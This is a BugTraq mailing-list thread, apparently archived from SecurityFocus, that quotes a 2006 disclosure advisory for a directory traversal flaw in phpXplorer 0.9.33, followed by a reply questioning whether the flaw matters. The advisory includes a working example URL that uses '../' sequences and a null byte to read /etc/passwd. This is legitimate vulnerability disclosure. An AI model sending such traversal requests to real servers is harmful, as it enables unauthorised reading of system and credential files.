BugTraq
Directory traversal in phpXplorer Jan 16 2006 10:10AM
Oriol Torrent (oriol torrent gmail com) (1 replies)
Re: Directory traversal in phpXplorer Jan 16 2006 08:00PM
Stan Bubrouski (stan bubrouski gmail com) (1 replies)
Seeing as phpXplorer allows the upload and editing of live PHP files
anyways it seems to me this exploit is completely useless. You can
use the script as intended to cat the password file if you want.
Right?

-sb

On 1/16/06, Oriol Torrent <oriol.torrent (at) gmail (dot) com [email concealed]> wrote:
> ==========================================================
> Title: Directory traversal in phpXplorer
>
> Application: phpXplorer
> Vendor: http://www.phpxplorer.org
> Vulnerable Versions: 0.9.33
> Bug: directory traversal
> Date: 16-January-2006
> Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >
>
> References:
> http://www.arrelnet.com/advisories/adv20060116.html
>
> ==========================================================
>
> 1) Background
> -----------
> phpXplorer is an open source file management system written in PHP.
> It enables you to work on a remote file system through a web browser.
>
>
> 2) Problem description
> --------------------
> An attacker can read arbitrary files outside the web root by sending
> specially formed requests
>
> Ex:
>
> http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../..
/../etc/passwd%00&ref=1
>
>
> 3) Solution:
> ----------
> No Patch available.
>
>
> 4) Timeline
> ---------
> 17/12/2005 Bug discovered
> 20/12/2005 Vendor receives detailed advisory. No response
> 04/01/2006 Second notification. No response
> 16/01/2006 Public Disclosure
>

[ reply ]
Re: Directory traversal in phpXplorer Jan 19 2006 08:06PM
Stan Bubrouski (stan bubrouski gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus